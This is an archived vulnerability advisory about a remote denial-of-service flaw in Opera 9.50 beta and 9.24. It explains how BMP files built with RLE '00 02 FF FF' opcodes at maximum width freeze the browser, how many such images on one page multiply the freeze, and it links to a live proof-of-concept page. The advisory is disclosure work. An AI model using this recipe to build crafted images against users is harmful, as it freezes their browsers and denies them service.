TUCoPS :: Browsers :: tb13703.htm

Opera 9.50 beta and prior remote DoS (freeze)
Opera 9.50 beta and prior remote DoS (freeze)
Opera 9.50 beta and prior remote DoS (freeze)


* Name   : Opera 9.50 beta / 9.24 Remote DoS=0D
* Type   : Remote DoS=0D
* Credits: Gynvael Coldwind of Vexillium  &  Simey=0D
* Impact : Low=0D
=0D
* Short description=0D
=0D
Opera is vulnerable to a remote DoS attack, using spacially crafted BMP=0D
files, that causes the browser to freeze for a short amount of time=0D
(around 4 minutes on fast computer). An attacker could create a web=0D
page that contains multiple BMP files displayed by an  tag. This=0D
would freeze the browser for N*4 minutes, where N is the number of=0D
images (so 100 images, the browser freezez for almost 7 hours). When=0D
frozen, the browser consumes 100% CPU power.=0D
=0D
=0D
* Verbose description=0D
=0D
BMP file format allows Run Length Encoding in case of 4 and 8 bit=0D
bitmaps. The RLE used in BMP format has additional features like=0D
skipping the decompression write pointer to end of the line (bytes 00=0D
00), skiping to the end of bitmap (00 01), and moving the write=0D
pointer to another line and column (00 02 XX YY).=0D
=0D
Opera has an ultra slow implementation of the 00 02 XX YY feature.=0D
Normalny an decompression algorithm adds XX and YY * width to the=0D
write pointer, but Opera has implemented a much slower way, with=0D
additional check etc. The implementation performs XX + YY * width=0D
incrementations (each with it's own checks and other calculations).=0D
=0D
An attacker could use this fact to create a BMP file with maximum=0D
possible width (in Opera this would be around 32000 pixels), and=0D
the file's data should be filled with 00 02 FF FF opcodes (see=0D
DoS_PoC/DoS_BMP_Generator/test10.cpp for a sample generator).=0D
=0D
One malformed bitmap freezes the browser for some time. The time=0D
depends on CPU speed. A simple benchmark tests have been performed:=0D
=0D
CPU TYPE/SPEED                    TIME=0D
Intel Core 2 Quad 2.4 GhZ         over 4 minutes=0D
Intel Celeron M 1.6 GhZ           over 20 minutes=0D
=0D
Through this time the browser is frozen, does not react to user=0D
commands, and does not redraw it's content.=0D
=0D
Additionally, the attacker could create a web page that contains=0D
multiple images ( tag) to freeze the browser for N*OneFreezeTime=0D
(where N is the number of images). See DoS_PoC/RunMe.html for a simple=0D
example (10 bitmaps used). Please note that due to Opera's bitmap=0D
caching, each bitmap should be named differently (for example=0D
test1.bmp, test2.bmp, and so on).=0D
=0D
=0D
* Proof of Concept=0D
=0D
(This DoS'es the Opera, no warning is provided ;>)=0D
http://gynvael.vexillium.org/opera_dos/=0D 
=0D
=0D
* Disclaimer=0D
=0D
This document and all the information it contains is provided "as is",=0D
without any warranty. The author is not responsible for the=0D
misuse of the information provided in this advisory. The advisory is=0D
provided for educational purposes only.=0D
=0D
Permission is hereby granted to redistribute this advisory, providing=0D
that no changes are made and that the copyright notices and=0D
disclaimers remain intact.=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH